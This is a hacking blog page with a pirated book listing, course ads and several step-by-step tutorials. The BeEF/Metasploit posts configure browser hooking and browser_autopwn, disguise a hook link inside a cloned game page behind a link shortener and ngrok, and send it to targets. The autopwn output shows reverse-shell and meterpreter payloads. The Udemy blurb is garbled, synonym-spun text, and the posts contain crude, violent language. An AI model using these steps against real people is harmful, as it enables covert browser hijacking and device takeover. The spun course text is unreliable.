Sunday, September 29, 2019

Grayhat hacking 5th edition

Gray hat hacking 5th edition

Gray hat hacking 5th edition Description

Cutting-edge techniques for finding and fixing critical security flaws

Fortify your network and avert digital catastrophe with proven strategies from a team of security experts. Completely updated and featuring 13 new chapters, Gray Hat Hacking: The Ethical Hacker’s Handbook, Fifth Edition explains the enemy’s current weapons, skills, and tactics and offers field-tested remedies, case studies, and ready-to-try testing labs. Find out how hackers gain access, overtake network devices, script and inject malicious code, and plunder Web applications and browsers. Android-based exploits, reverse engineering techniques, and cyber law are thoroughly covered in this state-of-the-art resource. And the new topic of exploiting the Internet of things is introduced in this edition.

•Build and launch spoofing exploits with Ettercap

•Induce error conditions and crash software using fuzzers

•Use advanced reverse engineering to exploit Windows and Linux software

•Bypass Windows Access Control and memory protection schemes

•Exploit web applications with Padding Oracle Attacks

•Learn the use-after-free technique used in recent zero days

•Hijack web browsers with advanced XSS attacks

•Understand ransomware and how it takes control of your desktop

•Dissect Android malware with JEB and DAD decompilers

•Find one-day vulnerabilities with binary diffing

•Exploit wireless systems with Software Defined Radios (SDR)

•Exploit Internet of things devices

•Dissect and exploit embedded devices

•Understand bug bounty programs

•Deploy next-generation honeypots

•Dissect ATM malware and analyze common ATM attacks

•Learn the business side of ethical hacking

Table of Contents
Title Page
Copyright Page
Part I Preparation
Chapter 1 Why Gray Hat Hacking? Ethics and Law
Know Your Enemy
The Current Security Landscape
Recognizing an Attack
The Gray Hat Way
Emulating the Attack
Frequency and Focus of Testing
Evolution of Cyberlaw
Understanding Individual Cyberlaws
Chapter 2 Programming Survival Skills
C Programming Language
Basic C Language Constructs
Sample Program
Compiling with gcc
Computer Memory
Random Access Memory
Segmentation of Memory
Programs in Memory
Strings in Memory
Putting the Pieces of Memory Together
Intel Processors
Assembly Language Basics
Machine vs. Assembly vs. C
Addressing Modes
Assembly File Structure
Debugging with gdb
gdb Basics
Disassembly with gdb
Python Survival Skills
Getting Python
“Hello, World!” in Python
Python Objects
Files with Python
Sockets with Python
For Further Reading
Chapter 3 Next-Generation Fuzzing
Introduction to Fuzzing
Types of Fuzzers
Mutation Fuzzers
Generation Fuzzers
Genetic Fuzzing
Mutation Fuzzing with Peach
Lab 3-1: Mutation Fuzzing with Peach
Generation Fuzzing with Peach
Crash Analysis
Lab 3-2: Generation Fuzzing with Peach
Genetic or Evolutionary Fuzzing with AFL
Lab 3-3: Genetic Fuzzing with AFL
For Further Reading
Chapter 4 Next-Generation Reverse Engineering
Code Annotation
IDB Annotation with IDAscope
C++ Code Analysis
Collaborative Analysis
Leveraging Collaborative Knowledge Using FIRST
Collaboration with BinNavi
Dynamic Analysis
Automated Dynamic Analysis with Cuckoo Sandbox
Bridging the Static-Dynamic Tool Gap with Labeless
For Further Reading
Chapter 5 Software-Defined Radio
Getting Started with SDR
What to Buy
Not So Quick: Know the Rules
Learn by Example
For Further Reading
Part II Business of Hacking
Chapter 6 So You Want to Be a Pen Tester?
The Journey from Novice to Expert
Pen Tester Ethos
Pen Tester Taxonomy
The Future of Hacking
Know the Tech
Know What Good Looks Like
Pen Tester Training
Degree Programs
Knowledge Transfer
Pen Tester Tradecraft
Personal Liability
Being the Trusted Advisor
Managing a Pen Test
For Further Reading
Chapter 7 Red Teaming Operations
Red Team Operations
Strategic, Operational, and Tactical Focus
Assessment Comparisons
Red Teaming Objectives
What Can Go Wrong
Limited Scope
Limited Time
Limited Audience
Overcoming Limitations
Planning Meetings
Defining Measurable Events
Understanding Threats
Attack Frameworks
Testing Environment
Adaptive Testing
External Assessment
Physical Security Assessment
Social Engineering
Internal Assessment
Lessons Learned
Chapter 8 Purple Teaming
Introduction to Purple Teaming
Blue Team Operations
Know Your Enemy
Know Yourself
Security Program
Incident Response Program
Common Blue Teaming Challenges
Purple Teaming Operations
Decision Frameworks
Disrupting the Kill Chain
Kill Chain Countermeasure Framework
Purple Team Optimization
For Further Reading
Chapter 9 Bug Bounty Programs
History of Vulnerability Disclosure
Full Vendor Disclosure
Full Public Disclosure
Responsible Disclosure
No More Free Bugs
Bug Bounty Programs
Types of Bug Bounty Programs
Controversy Surrounding Bug Bounty Programs
Popular Bug Bounty Program Facilitators
Bugcrowd in Depth
Program Owner Web Interface
Program Owner API Example
Researcher Web Interface
Earning a Living Finding Bugs
Selecting a Target
Registering (If Required)
Understanding the Rules of the Game
Finding Vulnerabilities
Reporting Vulnerabilities
Cashing Out
Incident Response
Disclosure to Users
Public Relations
For Further Reading
Part III Exploiting Systems
Chapter 10 Getting Shells Without Exploits
Capturing Password Hashes
Understanding LLMNR and NBNS
Understanding Windows NTLMv1 and NTLMv2 Authentication
Using Responder
Lab 10-1: Getting Passwords with Responder
Using Winexe
Lab 10-2: Using Winexe to Access Remote Systems
Lab 10-3: Using Winexe to Gain Elevated Privileges
Using WMI
Lab 10-4: Querying System Information with WMI
Lab 10-5: Executing Commands with WMI
Taking Advantage of WinRM
Lab 10-6: Executing Commands with WinRM
Lab 10-7: Using WinRM to Run PowerShell Remotely
For Further Reading
Chapter 11 Basic Linux Exploits
Stack Operations and Function-Calling Procedures
Buffer Overflows
Lab 11-1: Overflowing meet.c
Ramifications of Buffer Overflows
Local Buffer Overflow Exploits
Lab 11-2: Components of the Exploit
Lab 11-3: Exploiting Stack Overflows from the Command Line
Lab 11-4: Exploiting Stack Overflows with Generic Exploit Code
Lab 11-5: Exploiting Small Buffers
Exploit Development Process
Lab 11-6: Building Custom Exploits
For Further Reading
Chapter 12 Advanced Linux Exploits
Format String Exploits
Format Strings
Lab 12-1: Reading from Arbitrary Memory
Lab 12-2: Writing to Arbitrary Memory
Lab 12-3: Changing Program Execution
Memory Protection Schemes
Compiler Improvements
Lab 11-4: Bypassing Stack Protection
Kernel Patches and Scripts
Lab 12-5: Return to libc Exploits
Lab 12-6: Maintaining Privileges with ret2libc
Bottom Line
For Further Reading
Chapter 13 Windows Exploits
Compiling and Debugging Windows Programs
Lab 13-1: Compiling on Windows
Windows Compiler Options
Debugging on Windows with Immunity Debugger
Lab 13-2: Crashing the Program
Writing Windows Exploits
Exploit Development Process Review
Lab 13-3: Exploiting ProSSHD Server
Understanding Structured Exception Handling (SEH)
Understanding and Bypassing Windows Memory Protections
Safe Structured Exception Handling (SafeSEH)
Bypassing SafeSEH
SEH Overwrite Protection (SEHOP)
Bypassing SEHOP
Stack-Based Buffer Overrun Detection (/GS)
Bypassing /GS
Heap Protections
For Further Reading
Chapter 14 Advanced Windows Exploitation
Data Execution Prevention (DEP)
Address Space Layout Randomization (ASLR)
Enhanced Mitigation Experience Toolkit (EMET) and Windows Defender Exploit Guard
Bypassing ASLR
Bypassing DEP and Avoiding ASLR
Return-Oriented Programming
Building the ROP Chain
Defeating ASLR Through a Memory Leak
Triggering the Bug
Tracing the Memory Leak
Weaponizing the Memory Leak
Building the RVA ROP Chain
For Further Reading
Chapter 15 PowerShell Exploitation
Why PowerShell
Living Off the Land
PowerShell Logging
PowerShell Portability
Loading PowerShell Scripts
Lab 15-1: The Failure Condition
Lab 15-2: Passing Commands on the Command Line
Lab 15-3: Encoded Commands
Lab 15-4: Bootstrapping via the Web
Exploitation and Post-Exploitation with PowerSploit
Lab 15-5: Setting Up PowerSploit
Lab 15-6: Running Mimikatz Through PowerShell
Lab 15-7: Creating a Persistent Meterpreter Using PowerSploit
Using PowerShell Empire for C2
Lab 15-8: Setting Up Empire
Lab 15-9: Staging an Empire C2
Lab 15-10: Using Empire to Own the System
For Further Reading
Chapter 16 Next-Generation Web Application Exploitation
The Evolution of Cross-Site Scripting (XSS)
Setting Up the Environment
Lab 16-1: XSS Refresher
Lab 16-2: XSS Evasion from Internet Wisdom
Lab 16-3: Changing Application Logic with XSS
Lab 16-4: Using the DOM for XSS
Framework Vulnerabilities
Setting Up the Environment
Lab 16-5: Exploiting CVE-2017-5638
Lab 16-6: Exploiting CVE-2017-9805
Padding Oracle Attacks
Lab 16-7: Changing Data with the Padding Oracle Attack
For Further Reading
Chapter 17 Next-Generation Patch Exploitation
Introduction to Binary Diffing
Application Diffing
Patch Diffing
Binary Diffing Tools
Lab 17-1: Our First Diff
Patch Management Process
Microsoft Patch Tuesday
Obtaining and Extracting Microsoft Patches
Lab 17-2: Diffing MS17-010
Patch Diffing for Exploitation
DLL Side-Loading Bugs
Lab 17-3: Diffing MS16-009
For Further Reading
Part IV Advanced Malware Analysis
Chapter 18 Dissecting Mobile Malware
The Android Platform
Android Application Package
Application Manifest
Analyzing DEX
Java Decompilation
DEX Decompilation
DEX Disassembling
Example 18-1: Running APK in Emulator
Malware Analysis
The iOS Platform
iOS Security
iOS Applications
For Further Reading
Chapter 19 Dissecting Ransomware
The Beginnings of Ransomware
Options for Paying the Ransom
Dissecting Ransomlock
Example 19-1: Dynamic Analysis
Example 19-2: Static Analysis
Example 19-3: Analyzing Wannacry Ransomware
For Further Reading
Chapter 20 ATM Malware
ATM Overview
XFS Overview
XFS Architecture
XFS Manager
ATM Malware Analysis
Types of ATM Malware
Techniques for Installing Malware on ATMs
Techniques for Dissecting the Malware
ATM Malware Countermeasures
For Further Reading
Chapter 21 Deception: Next-Generation Honeypots
Brief History of Deception
Honeypots as a Form of Deception
Deployment Considerations
Setting Up a Virtual Machine
Open Source Honeypots
Lab 21-1: Dionaea
Lab 21-2: ConPot
Lab 21-3: Cowrie
Lab 21-4: T-Pot
Commercial Alternative: TrapX
For Further Reading
Part V Internet of Things
Chapter 22 Internet of Things to Be Hacked
Internet of Things (IoT)
Types of Connected Things
Wireless Protocols
Communication Protocols
Security Concerns
Shodan IoT Search Engine
Web Interface
Shodan Command-Line Interface
Lab 22-1: Using the Shodan Command Line
Shodan API
Lab 22-2: Testing the Shodan API
Lab 22-3: Playing with MQTT
Implications of This Unauthenticated Access to MQTT
IoT Worms: It Was a Matter of Time
Lab 22-4: Mirai Lives
For Further Reading
Chapter 23 Dissecting Embedded Devices
System on Chip (SoC)
Common Processor Architectures
Serial Interfaces
Debug Interfaces
SWD (Serial Wire Debug)
No Operating System
Real-Time Operating System
General Operating System
For Further Reading
Chapter 24 Exploiting Embedded Devices
Static Analysis of Vulnerabilities in Embedded Devices
Lab 24-1: Analyzing the Update Package
Lab 24-2: Performing Vulnerability Analysis
Dynamic Analysis with Hardware
The Test Environment Setup
Dynamic Analysis with Emulation
Lab 24-3: Setting Up FIRMADYNE
Lab 24-4: Emulating Firmware
Lab 24-5: Exploiting Firmware
Further Reading
Chapter 25 Fighting IoT Malware
Physical Access to the Device
RS-232 Overview
RS-232 Pinout
Exercise 25-1: Troubleshooting a Medical Device’s RS-232 Port
Setting Up the Threat Lab
ARM and MIPS Overview
Lab 25-1: Setting Up Systems with QEMU
Dynamic Analysis of IoT Malware
Lab 25-2: IoT Malware Dynamic Analysis
Platform for Architecture-Neutral Dynamic Analysis (PANDA)
BeagleBone Black Board
Reverse Engineering IoT Malware
Crash-Course ARM/MIPS Instruction Set
Lab 25-3: IDA Pro Remote Debugging and Reversing
IoT Malware Reversing Exercise
For Further Reading
Gray Hat Hacking The Ethical Hacker’s Handbook5th .pdf – 45.8 MB

Wednesday, September 25, 2019

Integrating Metasploit with Beef-xss Framework

Welcome lads to hacking a rise as always Im the laughing man and in this post i will show u how to integrate beef-xss with metasploit for browser autopwn
this will gave to a payload on targets device how sneaky is that hahaha so i wont be using the basic beef default page as i want make this look as real as i can i will all so be using link shorter’s to hide the url and i will be using beef-over-wan and ngrok to find out how to set up and use Beef-over-wan check my other post on beef over wan here so lets begin

What is Beef-xss Framework

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. … BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

what is metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7

How to integrate Metasploit with Beef-xss Framework

first of all we need to open the terminal and type gedit /usr/share/beef-xss/config.yaml and scroll down to metasploit and change enabled to true and then save
Hacking A Rise setmetatrue

Next we edit the /usr/share/beef-xss/extensions/metasploit/config.yaml so type gedit /usr/share/beef-xss/extensions/metasploit/config.yaml
in this file we need to set are ip and the callback_host: (and put your IP address there) and {os: ‘custom’, path: ”} (just paste the ‘/usr/share/metasploit-framework/’ for the path) to get your local ip use ifconfig

name: ‘Metasploit’
enable: true
# Metasploit msgrpc connection options
host: “”
port: 55552
user: “msf”
pass: “abc123”
uri: ‘/api’
ssl: true
ssl_version: ‘TLS1’
ssl_verify: true
# Public connect back host IP address for victim connections to Metasploit
callback_host: “”
# URIPATH from Metasploit Browser AutoPwn server module
autopwn_url: “autopwn”
# Start msfrpcd automatically with BeEF
auto_msfrpcd: true
auto_msfrpcd_timeout: 120
msf_path: [
{os: ‘osx’, path: ‘/opt/local/msf/’},
{os: ‘livecd’, path: ‘/opt/metasploit-framework/’},
{os: ‘bt5r3’, path: ‘/opt/metasploit/msf3/’},
{os: ‘bt5’, path: ‘/opt/framework3/msf3/’},
{os: ‘backbox’, path: ‘/opt/backbox/msf/’},
{os: ‘kali’, path: ‘/usr/share/metasploit-framework/’},
{os: ‘pentoo’, path: ‘/usr/lib/metasploit’},
{os: ‘custom’, path: ‘/usr/share/metasploit-framework/’}

save it

no we need to restart are PostgreSQL so type service postgresql start or /etc/init.d/postgresql restart
Hacking A Rise restartservicesql

(note only use one of the commands )

Now we are ready to start msfconsole whoop whoop so type msfconsole and type load msgrpc ServerHost= Pass=abc123 then it starts up .

msf5 > load msgrpc ServerHost= Pass=abc123
[*] MSGRPC Service:
[*] MSGRPC Username: msf
[*] MSGRPC Password: abc123
[*] Successfully loaded plugin: msgrpc
msf5 >

Hacking A Rise loadmsgrpc

Now we can start beef-xss so type this in to a new terminal cd /usr/share/beef-xss/ & then ./beef

Hacking A Rise loadbeefnow

as u see it says it works lol
Hacking A Rise Screenshot-from-2019-09-25-15-59-10

right now that is done we can stop beef-xss and metasploit and start Beef-over-Wan and ngrok you will have to edit the .ngrok2/ngrok.yml so type gedit .ngrok2/ngrok.yml and add this under your key like i have below

addr: 80
proto: http
addr: 3000
proto: http

Hacking A Rise ngrok2file

now we save and type ngrok start --all
Hacking A Rise ngrokstart-all
Hacking A Rise thelinks-

now we can start Beef-Over-Wan so type cd Beef and ls and then python it will ask you to press 1 or 0 pick 0 to skip the ngrok settings
Hacking A Rise pick00

gave it a min to load then it will ask you for ur frist link so go back to ngrok and copy the link with out the https or http it should look like this ( this the one that is open to 80
Hacking A Rise 80link

next is the link we will connect to the dashboard of beef-xss so thats be the one open to 3000 so copy it like this and paste to beef over wan
Hacking A Rise link3000

now we hit enter and with its done as u can see in the pic below my admin panel url is and the hook url is <--- this be the link you send Hacking A Rise donebeefos

Now come the fun part cloning the site so to save time im using a game called PirateJewelCollapse.html so now we go to the html folder in /var/www/html and find the beef.html file and open it in text editor
Hacking A Rise getscriptbeef

all we need is the little hook script right there under title just copy it now open the html file u want to use with beef agen im using a game coz im nice like that lol but save it when you done
Hacking A Rise copyit

right lads and gals we can use a link shorter or send the link the way it is be i say link shorter thank god hacking a rise has one lol
so we copy the hook link with out the beef.html and paste to hackingarise link shorter and add the name the html file you are using so the link looks like this
Hacking A Rise linkshornter

now the link as became
Hacking A Rise outputlink

u can now send it the target and log in to beef-xss frist we log in defult name and pass is beef

now we send the target the link
Hacking A Rise browsermeta

when the target clicks the link the it pop up under online click there ip and u can excute the commands
Hacking A Rise onlinebrowsers


This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law

Metasploit browser autopwn2

Metasploit browser autopwn2

welcome to hacking a rise as always I’m the laughing man so in the last post we talked about metasploit and share links or browser auto pwn we today we are going to talk about auxiliary/server/browser_autopwn2 the other autopwn module in Metasploit and the first one was out dated and wel so is this one but look there the odd chance it will work ya never know lads lol so let explain about it first and then get stuck in to using it

What is Metasploit browser autopwn2

Metasploit Framework includes a huge collection of client-side exploits, many of them are meant to exploit known vulnerabilities in web browsers and there is a module that has the ability to detect the version of browser the client is using and picks the best exploit to trigger, this module is browser_autopwn or browser_autopwn2, in its newest version.
credits to oreillys for this

How to use Metasploit browser autopwn2

First of all lads we need to start postgresql and Apache2 u can do this by typing service postgresql start & service apache2 start
Hacking A Rise startservicelink

Now if u have ngrok install start it cd ngrok ./ngrok http 8080 this forward your ports via ssh if you dont have ngrok then install it here
if you dont want ngrok you can use serveo for this we will be using as Im a lazy cunt lol
Hacking A Rise ngrokmetashare

Now lads we start Metasploit so open a new terminal and type msfconsole .
Hacking A Rise startmetashare

Now we type use auxiliary/server/browser_autopwn2 & show options in to metasploit this gave u the options u need to set
Hacking A Rise autopwn1

Next job to do is set the host u want to listen on and the ports and the uri path ssl if need but not important as ngrok dose it for you 😉 so in metasploit type this

    set SRVHOST if using servro or ngrok put link here
    set SRVPORT 8080 put the port here from serveo or ngrok
    set URIPATH /


now for the fun part type exploit in to metasploit and with for the magic link to show up when it dose go back to ngrok and send the first link to target in are case we are using /8080
Hacking A Rise startedexploit

dont send to the target as its a thats local host it wont work over wan on on lan use ngrok or serveo or forward ur ports via router

final thoughts

Well tbh its not the best module in metasploit but it mite work but for me i not really kean on it in that case i will use beef-xss and link to setoolkit and metasploit gave this not been updated since 2015 when it was added to metasploit u think they update it or add a new one


This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

Sunday, September 22, 2019

metasploit browser Autopwn 1

sup lads laughing man here with a new tutorial on browser auto pwn in metasploit in this i will be using it on my lan network so
( Two use over wan open the ports in the router Find out more here

What is metasploit browser autopwn

Browser Autopwn is the easiest and quickest way to explicitly test browser vulnerabilities without having the user to painfully learn everything there is about each exploit and the remote target before deployment.

Using metasploit browser autopwn

Open terminal and type service postgresql start
then type msfconsole
Hacking A Rise metasploitstart

Now we type use auxiliary/server/browser_autopwn
show option
Hacking A Rise setupautopwn

now we type run and with for the exploit start

msf5 auxiliary(server/browser_autopwn) > run
[*] Auxiliary module running as background job 0.

[*] Setup
msf5 auxiliary(server/browser_autopwn) >
[*] Starting exploit modules on host
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL:
[*] Server started.
[*] webview_addjavascriptinterface - Gathering target information for
[*] webview_addjavascriptinterface - Sending HTML response to
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL:
[*] Server started.
[*] Using URL:
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] java_atomicreferencearray - Generated jar to drop (5311 bytes).
[*] Using URL:
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL:
[*] Server started.
[*] Using URL:
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL:
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on
[*] Using URL:
[*] Server started.
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on
[*] Started reverse TCP handler on

[*] --- Done, found 20 exploit modules

[*] Using URL:

now we send one the link to the target depending on there system as you can see there one for android to windows this.

Hacking A Rise metalinks

my thoughts on browser autopwn

this a fast way to get a payload on the targets device as i use this a lot with beef-xss clone and site use ngrok or serveo to open the ports and a way you go. my next post will be on browser autopwn2 in metasploit as this method is old autopwn 2 is the new one


This tutorial is for learn not for you to go out and hack people as it agen the law and unmoral we do not support you hacking some one with out permissions so make sure u got owners consent before performing the attack with out this can lead to a prison term were you will get raped up the arse by a guy named bob as hacking is classed as a act of cyber terrorism no matter how funny it may be. in other words dont be a fucking wanker and respect other people's privacy as they respect yours

Tuesday, September 17, 2019



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This EXTENDED model comprises over 239+ detailed lectures and over 27+ HOURS of VIDEO coaching. It’s one of the crucial complete ITsec and moral hacking programs on Udemy.

Earlier than we start: the sensible use of the course you’re going to see has been confirmed by hundreds of individuals all around the world. Individuals who make their first steps in pc / community safety and professionals: community directors, programmers, pentesters, black- and white hat hackers. Please, learn rigorously what we’d prefer to share with you.

IT Safety Academy (ISA) is an organization that associates ITsec Professionals. Now we’re proud to share our data on-line. Licensed specialists (CISS, MCSE:MS, CEH, CISSP) have created programs from Newbie to Superior stage. Our aim is to supply the best high quality supplies you’ve ever seen on-line and put together you not just for certification exams, but additionally train you pratical abilities. You’re welcome to affix us and begin your coaching now – Licensed Moral Hacking

Concerning the moral hacking coaching

Community and IT safety is not any joke. In a matter of minutes cyber criminals can entry protected networks, view encrypted information, accounts, and even steal identities- Licensed Moral Hacking. This course is designed to introduce these ideas and the real-world ways that hackers use, to be able to shield your self and your community.

This course is good for everybody, no matter their abilities and experience. The association and presentation of studying sources will let each novices and extra superior college students broaden their data of IT safety, moral hacking and penetration testing.

Warning: Whereas this complete hacking coaching consists of step-by-step directions for superior hacking methods, it’s designed that can assist you stop an assault. We don’t suggest utilizing these methods to infiltrate networks or IT techniques with out permission and consent.

Develop into CISS – Licensed IT Safety Specialist by overlaying the next matters:

Safety and Hacking Myths Debunked
Newbie to Superior IT Safety
Microsoft Home windows Threats and WiFi Weaknesses
Present Black-Hat Threats and Traits
Designing Extra Safe Networks
Encrypted Knowledge, Establish Spoofing, and Home windows Authorization
IT Safety Academy Examination Preparation

Enhance Community Safety and Establish Weaknesses

Licensed hackers determine community safety threats to forestall felony hacking makes an attempt. The easiest way to do that, is to grasp how cyber criminals consider and check your community for vulnerabilities.

Contents and Overview

This course is designed for anybody searching for a profession in IT safety / Moral Hacking, in addition to programmers and expertise fans who wish to develop hacking and prevention abilities. A fundamental understanding of IT and infrastructure is beneficial however not required.

With 239 lectures and over 23+ hours of content material, you’ll begin with the fundamentals of hacking / IT safety and progress to the superior curriculum in a matter of days.

Who this course is for:
Hacking fans
Moral Hackers
Future IT Sec Professionals
IT College students
IT fans
Dimension: 2.5GB
Unziped : 5 GB


A complete guide to installing a free SSL certificate

Fix connection “Not Secure” warning in Google Chrome. A complete guide to installing a free SSL certificate.

What you’ll learn
Understand why SSL is important.
Understand how SSL works.
Migrate an HTTP WordPress website to HTTPS
Use AutoSSL if it is enabled on the host.
Setup redirects so Google will know the site has moved, and visitors will automatically be redirected to the secure HTTPS webpage.
Secure the WordPress dashboard, so those that login always have a secure connection.
Check that SSL is working on all pages on a website.
Find and fix mixed content.
You should have, or intend to have a WordPress website hosted on a web host using cPanel. Most hosting platforms do use cPanel..
You need access to your cPanel and WordPress dashboard.
Your web host should support server name indication (SNI) for Full (Strict) SSL. Ask them if in doubt, but most good hosts will. Without SNI, you can still implement the Flexible SSL described in this course and get the https lock.
Does your website show the connection as “Not Secure” in Google Chrome or other web browsers?

Every day in the news we hear about new online hacking scandals. People are aware of the need for increased security when going online, and maybe even shopping online. Trust is everything. If you run a website, then you need to act now.

Visitors to your website need to know they can trust you and your website.

Visitors can easily check by looking up at the address bar of their browser. If a web page is secure, they will see the comforting Padlock icon. Google Chrome goes one step further and adds the word “Secure” next to the padlock, just to reinforce the fact.
If a web page is not secure, there is no padlock, and Google Chrome may even state “Not Secure“.

How would that kill the trust your visitors have for your site?

The industry standard for establishing a secure and encrypted link to a website is called SSL (Secure Sockets Layer). This encryption ensures that all data moving between a web browser and a website server is private. You can tell if a website uses a secure connection because the URL begins with HTTPS://. The “s” in that prefix stands for secure, so https is the secure version of http.

To create this type of security, you need to have at least one certificate. These are issued by certificate authorities, and used to cost a lot of money. In fact, some still do. However, in this course, I will show you where you can get a free certificate and how to install it so that your site is secure. In the process, we will also add our site to Cloudflare, a content delivery network that speeds up and helps protect your website from hackers and spammers.

In this course you will learn:

What SSL is and why it is important for a website to have that https prefix.
That Google actually count SSL on a site as a ranking factor.
How HTTPS works and how to set it up on your website.
That some web hosts may have already set up an https version of your site using something called AutoSSL.
How to check if your site already has a secure version.
Why sites can have both http AND https versions, and why this is a bad idea.
What to look for in a web host to make the transition to https simple and pain-free.
What CloudFlare is and why you should be using it.
How to setup a free account on Cloudflare and then add your site to Cloudflare.
How to change the DNS at your registrar.
About the various types of SSL offered by Cloudflare.
About origin certificates.
How to exclude your site from AutoSSL and stop your cPanel from auto-generating certificates for you. You’ll see an example of why this can be a good idea.
How to create a free origin certificate at Cloudflare and how to install it on your server.
How to secure your WordPress dashboard.
How to get back into your dashboard if you accidentally get locked out in the process.
How to set up redirects so that all of the old http web pages automatically redirect to the secure https version. This type of redirect also alerts Google that the page has permanently moved to https.
How to avoid a problem caused by a specific WordPress caching plugin, and how to fix the problem if you still need to.
How to check your SSL is working on all pages of your website.
What mixed content is, how to find it, and how to fix it.
That there are other places you may need to update links, including the robots.txt and hard-coded links you may have inserted in the past.
How to update Google Analytics if you use it.
How to update things in Google Search Console (Webmaster Tools) if you use this service.
The course was created to be hands on, so I show you every step of the process using one of my own sites as an example. You can follow along as we go if you like. At the end of the course I have included a second conversion, from start to finish in a single video. This video has a text file you can download with all the steps, making this video and resource the ideal companion for you as you convert your own website.

Who this course is for:
WordPress website owners that want to move their HTTP site to the secure HTTPS
Anyone interested in learning more about SSL and why HTTPS is important going forward.
Created by Andrew Williams
Last updated 3/2019
English [Auto-generated]

Size: 504.19 MB

Download here

Saturday, September 14, 2019

Tutorial: Generate an SSL certificate - OpenSSL

Hello everyone, this is the Termux hacker of the whole team, IRISnoir. Do you miss me? If you do, I’m here with ya. If you don’t, then you’re an asshole (just kidding). Anyways, I’m back with another tutorial for our site. This time, it’s about how to generate an SSL certificate. No more of the bullcrap, let’s bounce!

Now, what you will need is:
openssl-tool to generate the SSL cert (Captain Obvious)
And that’s about it.

Now, an SSL certificate is used for website security. Now what it does is it will encrypt each and every last bits of any connections you make to the server. This includes your login credentials, clicked links and many more.

Fun fact: The URL is originally HTTP. But activating SSL will turn it to HTTPS. That is the sign that your connection is secure.

Now, the command to generate your certificate and private key is:
openssl req -x509 -newkey rsa:7403 -keyout certkey.pem -out cert.pem -days 365 -verify -set_serial 740340178739478 -sha512

It’s the command that I crafted. You just need to execute it. Then be patient while it auto crafts your cert and key. It has come to my attention that it will take shorter time if you exit Termux and go do other stuff like watching Youtube. After 2 or 3 videos, you can go back to Termux.

Now, you just need to answer all the questions it asks you. It’s really easy. When you’re done, check the current directory. If you see two new files: cert.pem and certkey.pem. Then, you’re doing it right.

To check if the certificate and private key works, use this command:
openssl s_server -key certkey.pem -cert cert.pem -accept 44330 -www
This command will attempt to establish a connection. Now, just go to your browser and connect to: https://localhost:44330

When you try to connect, your browser will warn you about some kind of ‘Security error’. But I assure you that nothing is to worry about. You’re actually on the right path.

The reason it says this is because the certificate is self-signed. It means that it is freely generated with something like OpenSSL. You don’t have to worry as there’s nothing for hackers to steal here.

Just continue with Advanced – Continue connecting to localhost

And there you go. If you see some info appearing, congratz. It is working fine and dandy.

Usage: It can be used with Apache2, and basically any other web servers that supports SSL. You just need some configuring and you’re good to go.

This is the end of the tutorial. If you enjoyed, please share it with your friends and also donate to us. It would mean a LOT. Have a nice day. And remember, stay safe, stay ethical.

Friday, September 6, 2019

How to bruteforce website logins with Hydra

Hello everyone, this is IRISnoir from Hackingarise. Coming at you hot with another post for our blog. This time, it’s about website logins and how to crack them open. You ready? Let’s bounce.

Hacking A Rise hydra-attempts

The first thing that you wanna do before all of this is hack yourself. That’s some advice from your pal. You just have to first register and then see if you can do it with the following steps.

Attempting to hack yourself will determine if the site has a bruteforce detector. If the provider is aware and uses stuff like CaptCHA, and sends false cracks, there is definitely some security erected and that is the sign that you need to stop and start learning more.

Tools required:
